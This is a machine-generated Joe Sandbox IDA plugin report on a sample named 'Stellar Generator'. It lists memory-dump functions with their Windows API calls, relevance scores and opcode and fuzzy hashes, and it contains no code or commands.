Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4d78d0affb8a5f9fed8e0802cf8e4ea3de8d8daa1aee40479776aa901c3285c3
Instruction ID: e4048cd9e3c040790d50d23613fa7a1cf3fd250f22dc2ea07715fa93b369c55a
Opcode Fuzzy Hash: 4d78d0affb8a5f9fed8e0802cf8e4ea3de8d8daa1aee40479776aa901c3285c3
Instruction Fuzzy Hash: 5D219FB18083898FDB01CFA9C955BDABFF4EF09314F15849AD444E7252D3789548CFA5

Function 072EF652 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 072EF6C0

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: c852b6be65ee055a4f93615ed055e41eb163095ad2232a3af8ce02864c210b1b
Instruction ID: 26c658b85e7e18577019a535a3615e915dc1e03616ebd5d7cf4b8b2f318be092
Opcode Fuzzy Hash: c852b6be65ee055a4f93615ed055e41eb163095ad2232a3af8ce02864c210b1b
Instruction Fuzzy Hash: 521137B6C002499FCB10CF9AD544BDEFBF8FB48320F10842AE958A3650D379A544CFA5

Function 05848260 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 058482CA

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: d7caff7717670d77330b69deb33e1a18ca0c68b492822c3aadd42d5ca858b1d7
Instruction ID: 864fc2498c9b5c888756c5418b850eb3f9a13fc0e007d0b6ce5823560da8b57e
Opcode Fuzzy Hash: d7caff7717670d77330b69deb33e1a18ca0c68b492822c3aadd42d5ca858b1d7
Instruction Fuzzy Hash: B31114B68006498FDB14CF9AC444BDEFBF4EF88310F10842AD859A3640D339A545CFA5

Function 072EF922 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 072EF98D

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 49bb46f007afa24621804d6f4703bbf8ed8944dd39c04331b7389e5617f62134
Instruction ID: 4729ee730a7b19af5ecfd76eb7c14d0d86196c403cdf180f200e4f8ffa2fe424
Opcode Fuzzy Hash: 49bb46f007afa24621804d6f4703bbf8ed8944dd39c04331b7389e5617f62134
Instruction Fuzzy Hash: 551137B58003499FCB10CF9AD544BDEFBF8EB08314F10842AE558A3600C379A544CFA5

Function 072EF658 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 072EF6C0

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: b3a570640385408e5eb67e7a6fc2f23eb2806503b2893b615999fb11674e9617
Instruction ID: bb078df8dfdcdeaa0898e0a23f428732d3aa6fb8e61621e171e81aa0aebd3b9d
Opcode Fuzzy Hash: b3a570640385408e5eb67e7a6fc2f23eb2806503b2893b615999fb11674e9617
Instruction Fuzzy Hash: 851104B5C102499FDB10DF9AD944BDEFBF8FB48320F10842AE958A3650D379A544CFA5

Function 072EF928 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 072EF98D

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: dc6b06b9b1b733b4755fdf2e789035606dda9fc76834861197f048c0df369262
Instruction ID: 9c05369c7f4d92ff1395f04f99bc3749a0de1ce442e212567000e669f5a11762
Opcode Fuzzy Hash: dc6b06b9b1b733b4755fdf2e789035606dda9fc76834861197f048c0df369262
Instruction Fuzzy Hash: 531104B58103499FDB10DF9AD944BDEFBF8EB48314F10842AE958A3240D379A644CFA5

Function 072E5228 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 072E5285

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: be794ccc00a9d2fea1e00b7ccd7df66f6f8c25c9d44a92f23937bc0c3dc7c090
Instruction ID: cc882701cb5a49583c0b096b9117615c514e8684a18caaea107d15f776300200
Opcode Fuzzy Hash: be794ccc00a9d2fea1e00b7ccd7df66f6f8c25c9d44a92f23937bc0c3dc7c090
Instruction Fuzzy Hash: 5E1106B58103499FDB10CF9AC845BDEFBF8EB48324F148419E558A3640D379A544CFA5

Function 058456EC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 058488F5

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f94d9855601c409d79f9b4b07a6648d7831f733e0be77176b78b81f5ed91713b
Instruction ID: fe4126b28724e98b8fec2e120c83e3eb0883385c3773967fcf64359c71b38eef
Opcode Fuzzy Hash: f94d9855601c409d79f9b4b07a6648d7831f733e0be77176b78b81f5ed91713b
Instruction Fuzzy Hash: F111F2B580034D9FDB10DF9AC489BDEFBF8EB48324F10845AE918A7600D375A944CFA5

Function 05848E00 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,05849231,?,?,00000000), ref: 058492A5

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fcd429ca04e3c4f4137d7756493511db1b2333be3a06ba83e022f403fc3af5ca
Instruction ID: 790488e135ec2cac254278c844f839acc6dff6b5d0b2f04243f01c5fb58d332e
Opcode Fuzzy Hash: fcd429ca04e3c4f4137d7756493511db1b2333be3a06ba83e022f403fc3af5ca
Instruction Fuzzy Hash: EB11E3B580034D9FCB20DF99D448BDEBBF8EB48324F108459E918A7600D375A944CFA1

Function 0584913C Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02BB6428,?,?), ref: 0584B45D

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: ab742131eb7fc1b9753b157d8328bc82f633ed10b10843579e3504de08bb8d4d
Instruction ID: 2cf46b883d64c7bddf10c4d9036c5f96e7c104d9f6b2b98e5363a17d8a6840e8
Opcode Fuzzy Hash: ab742131eb7fc1b9753b157d8328bc82f633ed10b10843579e3504de08bb8d4d
Instruction Fuzzy Hash: 6311E3B580024C9FCB10DF99D444BDEFBF8EB48314F108419E918A7200D375A944CFA5

Function 0142AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0142AF3E

Memory Dump Source

Source File: 00000001.00000002.2964140725.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_Stellar Generator.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8a4aecfb7ea6b511e42a6ec66324e4a64ac83f8a6b2280810a34ea1598d30e7e
Instruction ID: 3fadd39686662e325c6ab08b52dc87742fe55b0276054b1d33d86d204a0a0c47
Opcode Fuzzy Hash: 8a4aecfb7ea6b511e42a6ec66324e4a64ac83f8a6b2280810a34ea1598d30e7e
Instruction Fuzzy Hash: 7C1110B6C002498FDB10CF9AD444ADEFBF4AF88314F21841AD918B7A50D379A549CFA1

Function 07964DB8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

DispatchMessageA.USER32 ref: 07964E1D

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 718c8102487f8fa296cc636331e53a983918e7b41c0404e9d335aca044327c01
Instruction ID: cb018123e13874cbc102c32f654fa612bdd36b0db047f3eb78084a920275b389
Opcode Fuzzy Hash: 718c8102487f8fa296cc636331e53a983918e7b41c0404e9d335aca044327c01
Instruction Fuzzy Hash: 6E1133B5C042499FCB10DF9AD448BDEFBF4EB48324F10851AD818B3610D338A644CFA5

Function 0584B3F9 Relevance: 1.5, APIs: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02BB6428,?,?), ref: 0584B45D

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: c0498c579b13c471606c39d02caa257798d68865ec3ba9120c85377fbed4f144
Instruction ID: 5807ade650833e146ca88501212bb991e242c005c306666aa6621fe6d162203e
Opcode Fuzzy Hash: c0498c579b13c471606c39d02caa257798d68865ec3ba9120c85377fbed4f144
Instruction Fuzzy Hash: 0F11C2B58103499FDB10DF9AD889BDEFBF8FB48324F10841AE958A7600D375A944CFA5

Function 05849240 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,05849231,?,?,00000000), ref: 058492A5

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 563809c381903a19556c976240ac822287c423fbd9ee7ae38ebdf817b090791f
Instruction ID: c71d5937f738953d3e9a890243f16fa6cf184f518f6b2c0a00065e62a07c12f6
Opcode Fuzzy Hash: 563809c381903a19556c976240ac822287c423fbd9ee7ae38ebdf817b090791f
Instruction Fuzzy Hash: 1811B0B58103499FDB20DF99D489BDEFBF8EB48324F208459E918A7600D375A944CFA1

Function 05281B31 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05281B95

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a6b608c5df58116d9b48779c82a735b74b9cbef620431602d7bdb0d56a8ab5a2
Instruction ID: 05636562e04f1a2f847d878a17d1715982d274648d9643aff4d3964271cdbc3e
Opcode Fuzzy Hash: a6b608c5df58116d9b48779c82a735b74b9cbef620431602d7bdb0d56a8ab5a2
Instruction Fuzzy Hash: FE1133B58002489FCB10DF9AC584BEEFBF8EB48324F10841AD919B3340D375A944CFA1

Function 05848893 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 058488F5

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 485562741d3c2c5d9331814cf1cae154686829a5738917b8c663b4dcfd3ea3b1
Instruction ID: 2998f393b7ae5d0b72273a4830b69f9087ab5b306fce7deff91950515db4571a
Opcode Fuzzy Hash: 485562741d3c2c5d9331814cf1cae154686829a5738917b8c663b4dcfd3ea3b1
Instruction Fuzzy Hash: 1411D3B58003499FDB10DF9AD885BDEFBF8EB48314F108419E918A7640D375A944CFA5

Function 072EFDFA Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 072EFE5D

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: fb2432532146a45fe7db7f3e47240a49b7755d81c231a2ad6af7dc0534007544
Instruction ID: 508b334d409a29bfbe7f03adf2e67c73e20a79f91e4f7e575d01166ae267a93e
Opcode Fuzzy Hash: fb2432532146a45fe7db7f3e47240a49b7755d81c231a2ad6af7dc0534007544
Instruction Fuzzy Hash: 0A1103B5C142899FCB10DF9AD544BDEFBF4EB48314F14841AD528B3600D375A544CFA5

Function 05281B38 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 05281B95

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 7a2543f29cba94c22144b4ee3fea7c5e7ff70d9c653c0eafaaf7d4020534366b
Instruction ID: 152d21a0e3bd8c533d14b727a4a779158b82d5a21bf26d7fe8740194017579e9
Opcode Fuzzy Hash: 7a2543f29cba94c22144b4ee3fea7c5e7ff70d9c653c0eafaaf7d4020534366b
Instruction Fuzzy Hash: 951103B58002499FDB10DF9AD584BDEFBF8EB48324F10841AD918B3640D375A944CFA1

Function 07964DC0 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageA.USER32 ref: 07964E1D

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 94229820d89ec3f13655298cbc6c49458582f1811eadf818a6481eafda13c355
Instruction ID: ee681f01dce8381f73967745e8db0e8d4bd2349b5bf357719da093d4a36bca09
Opcode Fuzzy Hash: 94229820d89ec3f13655298cbc6c49458582f1811eadf818a6481eafda13c355
Instruction Fuzzy Hash: 33110DB5C002898FCB10DF9AD448BCEFBF8EB48324F10852AD918B3610D379A644CFA5

Function 072EFE00 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 072EFE5D

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: b91ed9b2f1ae98c73c348648da38b6acaaa48a7a622cd332d9b70bd0ba12a6a5
Instruction ID: 77d6623550101992bad564a42e199590e802a318777951604684575d64787ac6
Opcode Fuzzy Hash: b91ed9b2f1ae98c73c348648da38b6acaaa48a7a622cd332d9b70bd0ba12a6a5
Instruction Fuzzy Hash: 2A1112B5C102898FCB10DF9AD544BCEFBF8EB48314F10841AD518B3200D379A544CFA5

Function 079415B0 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

(bq, xrefs: 079430EC

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 42e4d946adcd86d923970bc6277eae04f24fbb682de3cad4c8054f7a0d5d39eb
Instruction ID: d4746f1da18cf1e708473ec19946bc39b9f934759bc565fd142faea15ae4655b
Opcode Fuzzy Hash: 42e4d946adcd86d923970bc6277eae04f24fbb682de3cad4c8054f7a0d5d39eb
Instruction Fuzzy Hash: 335112B5A082589FCB15DFB9C858AAEBFF9EF89214F14846BD405E7342DB349C01CB61

Function 079409C8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

(&^q, xrefs: 079409D8

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID: (&^q
API String ID: 0-2067289071
Opcode ID: 97337c339e9aba49bfe6bb445218b593c7cbdf65febd8d62aed3ae173832bf80
Instruction ID: 19b787481a954aab6fc3df232b46b41545923e6d29c05f0acc0e78c032822a73
Opcode Fuzzy Hash: 97337c339e9aba49bfe6bb445218b593c7cbdf65febd8d62aed3ae173832bf80
Instruction Fuzzy Hash: 51315075A10269CFEF259F64C844FADBBB6AF44304F0088EAD60AB7250DB758E81CF51

Function 079489F2 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9611150218b6271ba801307c3e847a3e98be7a38fda7b48f7cb6be580ef8a57
Instruction ID: 5532f2a66bb3e9736a477da4ae1b3d44a3e45b3c90ff946b4f86caf913935a64
Opcode Fuzzy Hash: c9611150218b6271ba801307c3e847a3e98be7a38fda7b48f7cb6be580ef8a57
Instruction Fuzzy Hash: 0351E0B79186929FCB02CB58FC09DE8FF64EB42629B09818BD4555F153C3629586CFC2

Function 07941DB0 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de653edd47676e72d03ca7b15ad188625a5ed428dbe37c7f9b1c382b477de511
Instruction ID: b554e080bae3dac21c5638edc8f4aebc659608e5fed40b8c7703e96ddd739dea
Opcode Fuzzy Hash: de653edd47676e72d03ca7b15ad188625a5ed428dbe37c7f9b1c382b477de511
Instruction Fuzzy Hash: EE5158B4A0060ADFCB20DF69D5849AFBBF9FF88314B10C929E45AD7610D730E956CB91

Function 07942AC8 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5566b671e25286e1f3ac519189ff332b7c661ed0fd1f63dd29774dbf1774fa5
Instruction ID: bc329bb6a63b0cc20e33148ff9a6fe99232970a95d149ab7fde1f21fb96ee9b7
Opcode Fuzzy Hash: d5566b671e25286e1f3ac519189ff332b7c661ed0fd1f63dd29774dbf1774fa5
Instruction Fuzzy Hash: 0841F1B17042559FC715AB79D8A486ABFEAEFCA21870541BEE009CB352DE31DC41C7A2

Function 07948BE2 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aca5a18f50ce5386732ef51e038402ca390e524b06b66347ec4cbd4aebf893
Instruction ID: fc6ffc2fd307a3c7188fa41d21a0f15ecc934d3e8e0b8b11954270b47e1414db
Opcode Fuzzy Hash: 88aca5a18f50ce5386732ef51e038402ca390e524b06b66347ec4cbd4aebf893
Instruction Fuzzy Hash: F851057A914109EFCB02DF94C844DEABBF6FF88314B06C5A6E9089B231D335D965DB90

Function 07941C08 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b663abe4da6255b430804569229674dfb7287cce2be1883e5a5912db1ee79b6
Instruction ID: ac44d750bd6b26255de32599dee0fc7d7d06515d5554b3aa7a8a854a30df0e92
Opcode Fuzzy Hash: 4b663abe4da6255b430804569229674dfb7287cce2be1883e5a5912db1ee79b6
Instruction Fuzzy Hash: F251E674A0020ADFCB04DFA8D8849DDFBB1FF89314F14C26AE815AB325D771A856CB90

Function 079436B2 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeec4e61a078db915a360cef5f1f8cdaa27aaa301625169789fcfcb7a96d066b
Instruction ID: 7f97f9e7d5f6cee5bbc2f5192eaefc7743671a21129db169da15fc6275b6e545
Opcode Fuzzy Hash: aeec4e61a078db915a360cef5f1f8cdaa27aaa301625169789fcfcb7a96d066b
Instruction Fuzzy Hash: 874129F5B102059FCB18DFB9C598A9DBBF6AF89218F248069D406BB364DB71DC41CB50

Function 07941FA8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54f0d3f98e09f83b6c8b19ffd8eae62f36eafdda60df58b61790ab691081721
Instruction ID: 0062d894e111334918c4bfc1da9906dec9da32e1412817f9714d0b18b66dec2b
Opcode Fuzzy Hash: f54f0d3f98e09f83b6c8b19ffd8eae62f36eafdda60df58b61790ab691081721
Instruction Fuzzy Hash: 003184B1F0021A9BCB25DF69D8489AFB7FAFF88714F00852AE815DB654DB719901CB90

Function 07944C68 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf11cad77ba9599a8634090c48c711b778f297a8839aef0bc749637f671792dc
Instruction ID: 5057a30b178bf1bc224087841a9e2ed08b4ef53440dfe9b51adea31ecfacdf58
Opcode Fuzzy Hash: cf11cad77ba9599a8634090c48c711b778f297a8839aef0bc749637f671792dc
Instruction Fuzzy Hash: EA31B5B5F10119CBCF14DEB8E994BEDBBB6AB88214F108426E511F7390DB309C01CB91

Function 07949EA0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c9238f4ca5ec6ad8c2833ea53043f21b4c55824458864a9451c15f32cc837c
Instruction ID: 8e332c5c068284a3d6a3629cda9f9dce03b8f76e789200491988809ba89838a1
Opcode Fuzzy Hash: 27c9238f4ca5ec6ad8c2833ea53043f21b4c55824458864a9451c15f32cc837c
Instruction Fuzzy Hash: EB3172B0A011158FEB68CA24CD91B9AB7B6EB86304F50C8F9D509F7384DA755E84CFA4

Function 07941534 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec23285367673e74bb102c61f86e3a99006d203dd48a22321141d474b547860
Instruction ID: 88f5759117bb3b5b5e6edfc021eb518f8b8605704abd105ab6e9422fb3c27d5b
Opcode Fuzzy Hash: bec23285367673e74bb102c61f86e3a99006d203dd48a22321141d474b547860
Instruction Fuzzy Hash: EF3158B1D083499FCB14DFAAD844A9EFFF4AF49314F14846AE409E3650E7349944CBA1

Function 0102D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2962399985.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_102d000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aba207c7bfe1e820fa71aafd70450b71d4833c3aa6daf80e975b6c1ec14dd22
Instruction ID: 95c327ed49cc2e2ae28b8ef7494b0c5321738e401b6735dd3e3bbea287c25db6
Opcode Fuzzy Hash: 2aba207c7bfe1e820fa71aafd70450b71d4833c3aa6daf80e975b6c1ec14dd22
Instruction Fuzzy Hash: 27213A71504204DFDB05DF58D9C0B5ABFA5FB88314F20C1ADE9490F25AC736E856C7A1

Function 0103D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2962882090.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_103d000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f380240421561b52d2eec27813d10857cb06310169aa00dd655ba79b996f43
Instruction ID: 5b7b3406e412bd6cfe9b58b78182ae36aee1dd34718f86daae0ee460eeb671f9
Opcode Fuzzy Hash: 10f380240421561b52d2eec27813d10857cb06310169aa00dd655ba79b996f43
Instruction Fuzzy Hash: 0B214671504200EFDB41DF98D9C0B26BBA9FBD8324F60C5ADE8894B256C336D40ACB61

Function 0103D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2962882090.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_103d000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aeafea21fc7efdeda40a173949e8b7ce2ab603b0734ef0b6d692b00bbcee79f
Instruction ID: 71c21b46e6169e7385493c06babad1c7b613b1898bc21ff0dcf04364694efc09
Opcode Fuzzy Hash: 9aeafea21fc7efdeda40a173949e8b7ce2ab603b0734ef0b6d692b00bbcee79f
